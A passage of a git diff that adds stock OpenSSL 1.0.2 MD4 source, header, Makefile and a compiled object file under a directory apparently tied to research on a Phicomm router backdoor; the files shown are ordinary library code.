+md4_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md4_one.o: ../../include/openssl/md4.h ../../include/openssl/opensslconf.h
+md4_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md4_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md4_one.o: ../../include/openssl/symhacks.h md4_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile.save
new file mode 100644
index 0000000..e6f1e44
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile.save
@@ -0,0 +1,89 @@
+#
+# OpenSSL/crypto/md4/Makefile
+#
+
+DIR=    md4
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=md4test.c
+APPS=md4.c
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md4_dgst.c md4_one.c
+LIBOBJ=md4_dgst.o md4_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= md4.h
+HEADER= md4_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f ../../include/openssl/$(EXHEADER) ../../test/$(TEST) ../../apps/$(APPS)
+
+clean:
+	rm -f asm/mx86unix.cpp *.o asm/*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md4_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md4_dgst.o: ../../include/openssl/md4.h ../../include/openssl/opensslconf.h
+md4_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md4_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md4_dgst.o: ../../include/openssl/symhacks.h ../md32_common.h md4_dgst.c
+md4_dgst.o: md4_locl.h
+md4_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md4_one.o: ../../include/openssl/md4.h ../../include/openssl/opensslconf.h
+md4_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md4_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md4_one.o: ../../include/openssl/symhacks.h md4_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4.c
new file mode 100644
index 0000000..c9fab66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4.c
@@ -0,0 +1,121 @@
+/* crypto/md4/md4.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md4.h>
+
+#define BUFSIZE 1024*16
+
+void do_fp(FILE *f);
+void pt(unsigned char *md);
+#if !defined(_OSD_POSIX) && !defined(__DJGPP__)
+int read(int, void *, unsigned int);
+#endif
+
+int main(int argc, char **argv)
+{
+    int i, err = 0;
+    FILE *IN;
+
+    if (argc == 1) {
+        do_fp(stdin);
+    } else {
+        for (i = 1; i < argc; i++) {
+            IN = fopen(argv[i], "r");
+            if (IN == NULL) {
+                perror(argv[i]);
+                err++;
+                continue;
+            }
+            printf("MD4(%s)= ", argv[i]);
+            do_fp(IN);
+            fclose(IN);
+        }
+    }
+    exit(err);
+}
+
+void do_fp(FILE *f)
+{
+    MD4_CTX c;
+    unsigned char md[MD4_DIGEST_LENGTH];
+    int fd;
+    int i;
+    static unsigned char buf[BUFSIZE];
+
+    fd = fileno(f);
+    MD4_Init(&c);
+    for (;;) {
+        i = read(fd, buf, sizeof buf);
+        if (i <= 0)
+            break;
+        MD4_Update(&c, buf, (unsigned long)i);
+    }
+    MD4_Final(&(md[0]), &c);
+    pt(md);
+}
+
+void pt(unsigned char *md)
+{
+    int i;
+
+    for (i = 0; i < MD4_DIGEST_LENGTH; i++)
+        printf("%02x", md[i]);
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4.h
new file mode 100644
index 0000000..11fd712
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4.h
@@ -0,0 +1,119 @@
+/* crypto/md4/md4.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_MD4_H
+# define HEADER_MD4_H
+
+# include <openssl/e_os2.h>
+# include <stddef.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_NO_MD4
+#  error MD4 is disabled.
+# endif
+
+/*-
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ * ! MD4_LONG has to be at least 32 bits wide. If it's wider, then !
+ * ! MD4_LONG_LOG2 has to be defined along.                        !
+ * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ */
+
+# if defined(__LP32__)
+#  define MD4_LONG unsigned long
+# elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__)
+#  define MD4_LONG unsigned long
+#  define MD4_LONG_LOG2 3
+/*
+ * _CRAY note. I could declare short, but I have no idea what impact
+ * does it have on performance on none-T3E machines. I could declare
+ * int, but at least on C90 sizeof(int) can be chosen at compile time.
+ * So I've chosen long...
+ *                                      <appro@fy.chalmers.se>
+ */
+# else
+#  define MD4_LONG unsigned int
+# endif
+
+# define MD4_CBLOCK      64
+# define MD4_LBLOCK      (MD4_CBLOCK/4)
+# define MD4_DIGEST_LENGTH 16
+
+typedef struct MD4state_st {
+    MD4_LONG A, B, C, D;
+    MD4_LONG Nl, Nh;
+    MD4_LONG data[MD4_LBLOCK];
+    unsigned int num;
+} MD4_CTX;
+
+# ifdef OPENSSL_FIPS
+int private_MD4_Init(MD4_CTX *c);
+# endif
+int MD4_Init(MD4_CTX *c);
+int MD4_Update(MD4_CTX *c, const void *data, size_t len);
+int MD4_Final(unsigned char *md, MD4_CTX *c);
+unsigned char *MD4(const unsigned char *d, size_t n, unsigned char *md);
+void MD4_Transform(MD4_CTX *c, const unsigned char *b);
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_dgst.c
new file mode 100644
index 0000000..614fca0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_dgst.c
@@ -0,0 +1,199 @@
+/* crypto/md4/md4_dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+#include "md4_locl.h"
+
+const char MD4_version[] = "MD4" OPENSSL_VERSION_PTEXT;
+
+/*
+ * Implemented from RFC1186 The MD4 Message-Digest Algorithm
+ */
+
+#define INIT_DATA_A (unsigned long)0x67452301L
+#define INIT_DATA_B (unsigned long)0xefcdab89L
+#define INIT_DATA_C (unsigned long)0x98badcfeL
+#define INIT_DATA_D (unsigned long)0x10325476L
+
+fips_md_init(MD4)
+{
+    memset(c, 0, sizeof(*c));
+    c->A = INIT_DATA_A;
+    c->B = INIT_DATA_B;
+    c->C = INIT_DATA_C;
+    c->D = INIT_DATA_D;
+    return 1;
+}
+
+#ifndef md4_block_data_order
+# ifdef X
+#  undef X
+# endif
+void md4_block_data_order(MD4_CTX *c, const void *data_, size_t num)
+{
+    const unsigned char *data = data_;
+    register unsigned MD32_REG_T A, B, C, D, l;
+# ifndef MD32_XARRAY
+    /* See comment in crypto/sha/sha_locl.h for details. */
+    unsigned MD32_REG_T XX0, XX1, XX2, XX3, XX4, XX5, XX6, XX7,
+        XX8, XX9, XX10, XX11, XX12, XX13, XX14, XX15;
+#  define X(i)   XX##i
+# else
+    MD4_LONG XX[MD4_LBLOCK];
+#  define X(i)   XX[i]
+# endif
+
+    A = c->A;
+    B = c->B;
+    C = c->C;
+    D = c->D;
+
+    for (; num--;) {
+        (void)HOST_c2l(data, l);
+        X(0) = l;
+        (void)HOST_c2l(data, l);
+        X(1) = l;
+        /* Round 0 */
+        R0(A, B, C, D, X(0), 3, 0);
+        (void)HOST_c2l(data, l);
+        X(2) = l;
+        R0(D, A, B, C, X(1), 7, 0);
+        (void)HOST_c2l(data, l);
+        X(3) = l;
+        R0(C, D, A, B, X(2), 11, 0);
+        (void)HOST_c2l(data, l);
+        X(4) = l;
+        R0(B, C, D, A, X(3), 19, 0);
+        (void)HOST_c2l(data, l);
+        X(5) = l;
+        R0(A, B, C, D, X(4), 3, 0);
+        (void)HOST_c2l(data, l);
+        X(6) = l;
+        R0(D, A, B, C, X(5), 7, 0);
+        (void)HOST_c2l(data, l);
+        X(7) = l;
+        R0(C, D, A, B, X(6), 11, 0);
+        (void)HOST_c2l(data, l);
+        X(8) = l;
+        R0(B, C, D, A, X(7), 19, 0);
+        (void)HOST_c2l(data, l);
+        X(9) = l;
+        R0(A, B, C, D, X(8), 3, 0);
+        (void)HOST_c2l(data, l);
+        X(10) = l;
+        R0(D, A, B, C, X(9), 7, 0);
+        (void)HOST_c2l(data, l);
+        X(11) = l;
+        R0(C, D, A, B, X(10), 11, 0);
+        (void)HOST_c2l(data, l);
+        X(12) = l;
+        R0(B, C, D, A, X(11), 19, 0);
+        (void)HOST_c2l(data, l);
+        X(13) = l;
+        R0(A, B, C, D, X(12), 3, 0);
+        (void)HOST_c2l(data, l);
+        X(14) = l;
+        R0(D, A, B, C, X(13), 7, 0);
+        (void)HOST_c2l(data, l);
+        X(15) = l;
+        R0(C, D, A, B, X(14), 11, 0);
+        R0(B, C, D, A, X(15), 19, 0);
+        /* Round 1 */
+        R1(A, B, C, D, X(0), 3, 0x5A827999L);
+        R1(D, A, B, C, X(4), 5, 0x5A827999L);
+        R1(C, D, A, B, X(8), 9, 0x5A827999L);
+        R1(B, C, D, A, X(12), 13, 0x5A827999L);
+        R1(A, B, C, D, X(1), 3, 0x5A827999L);
+        R1(D, A, B, C, X(5), 5, 0x5A827999L);
+        R1(C, D, A, B, X(9), 9, 0x5A827999L);
+        R1(B, C, D, A, X(13), 13, 0x5A827999L);
+        R1(A, B, C, D, X(2), 3, 0x5A827999L);
+        R1(D, A, B, C, X(6), 5, 0x5A827999L);
+        R1(C, D, A, B, X(10), 9, 0x5A827999L);
+        R1(B, C, D, A, X(14), 13, 0x5A827999L);
+        R1(A, B, C, D, X(3), 3, 0x5A827999L);
+        R1(D, A, B, C, X(7), 5, 0x5A827999L);
+        R1(C, D, A, B, X(11), 9, 0x5A827999L);
+        R1(B, C, D, A, X(15), 13, 0x5A827999L);
+        /* Round 2 */
+        R2(A, B, C, D, X(0), 3, 0x6ED9EBA1L);
+        R2(D, A, B, C, X(8), 9, 0x6ED9EBA1L);
+        R2(C, D, A, B, X(4), 11, 0x6ED9EBA1L);
+        R2(B, C, D, A, X(12), 15, 0x6ED9EBA1L);
+        R2(A, B, C, D, X(2), 3, 0x6ED9EBA1L);
+        R2(D, A, B, C, X(10), 9, 0x6ED9EBA1L);
+        R2(C, D, A, B, X(6), 11, 0x6ED9EBA1L);
+        R2(B, C, D, A, X(14), 15, 0x6ED9EBA1L);
+        R2(A, B, C, D, X(1), 3, 0x6ED9EBA1L);
+        R2(D, A, B, C, X(9), 9, 0x6ED9EBA1L);
+        R2(C, D, A, B, X(5), 11, 0x6ED9EBA1L);
+        R2(B, C, D, A, X(13), 15, 0x6ED9EBA1L);
+        R2(A, B, C, D, X(3), 3, 0x6ED9EBA1L);
+        R2(D, A, B, C, X(11), 9, 0x6ED9EBA1L);
+        R2(C, D, A, B, X(7), 11, 0x6ED9EBA1L);
+        R2(B, C, D, A, X(15), 15, 0x6ED9EBA1L);
+
+        A = c->A += A;
+        B = c->B += B;
+        C = c->C += C;
+        D = c->D += D;
+    }
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..7c2ea6ad0f442402563e12155cb3332915c16f32
GIT binary patch
literal 4088
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
T0?k_f5+;P^yoJ_mb*=sbpz{oN

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_locl.h
new file mode 100644
index 0000000..dc86a86
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/md4_locl.h
@@ -0,0 +1,113 @@
+/* crypto/md4/md4_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
